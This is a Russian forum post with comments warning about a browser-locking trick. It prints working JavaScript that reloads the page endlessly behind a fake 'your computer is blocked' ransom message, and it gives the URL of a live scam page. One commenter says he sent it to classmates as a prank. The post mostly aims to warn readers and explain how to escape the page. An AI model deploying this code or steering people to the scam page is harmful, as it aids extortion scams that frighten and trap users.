Из Хабра, думаю будет полезно и здесь:
Простой трюк позволяет создать страницу, которую нельзя будет закрыть в Google Chrome.
Пруф: Попробовать
Зловредный код выглядит крайне просто:
onbeforeunload=function(){
location.reload();
return "ВАШ КОМПЬЮТЕР ЗАБЛОКИРОВАН ...";
};
onload=function(){
location.reload();
}
В приведенном примере из-за музыки страница перезагружается чуть дольше, и ее можно успеть закрыть.
Трюк уже используется мошенниками, вымогающими деньги под предлогом блокировки компьютера:
хттп://stop.podzone.org/stop_ip.php?gorod=Moscow&ip=127.0.0.1&sid=1&br=1
Оригинал
Работает как в Хроме так и в Опере и даже в Мозилле. В правда в последней всё не так плохо, весь браузер хотя бы не блокируется...
Так же работает на андроидфонах. По крайней мере в стандартном браузере. Закрыть то вкладку или весь браузер можно легко и просто, но эта шняга зависает в процессах и музыка играет без остановки.
Так что будьте бдительны и не ведитесь) Гг
Забыл ещё сказать, что это в основном для Винды. На MacOS или том же Линуксе(правда не на всём) такого не будет. То есть оно то будет, но его можно будет легко закрыть.
Что только не придумают лишь бы людям навредить.
как зашел так и вышел. моему фраирфоксу чет пофиг гг
Быстро тыкаем enter и по крестику закрытия окна)) И проблема решена)
# Kip-OK (24.11.2014 / 14:38)
как зашел так и вышел. моему фраирфоксу чет пофиг гг
С Хрома пробуй или Оперы.
# Simba (24.11.2014 / 15:05)
Быстро тыкаем enter и по крестику закрытия окна)) И проблема решена)
Это ещё успеть надо. У меня с 3 попытки получилось. И тут ещё прикол в том, что из-за загрузки музыки обновление страницы дольше немного идёт. Хотя это ещё смотря какой интернет. При медленном - легко можно закрыть вкладку при обновлении.
Попробуй по второй ссылке зайти и так сделать, там музыки уже нет.
П.С.
Хотя и по второй ссылке это возможно сделать. Но я думаю какой то школьник, или не очень умный пользователь ПК вряд ли знает как закрыть такое. А оно на них и рассчитано. Поскидывал первую ссылку своим одногрупникам, так некоторые даже ПК перезагружали что бы избавиться от этой шняги. Двоим в голову пришло зайти в Диспетчер задач Винды и оттуда закрыть весь браузер. Я тоже так это закрывал, в Хроме правда Диспетчер Хрома юзал.
А ещё прикол был, когда ПК перезагрузили зашли в браузер а там эта шняга осталась. Гг Так как в настройках стояло открытие не закрытых вкладок, если есть, при открытии браузера. Ыы
макстон пришлось через диспетчер закрывать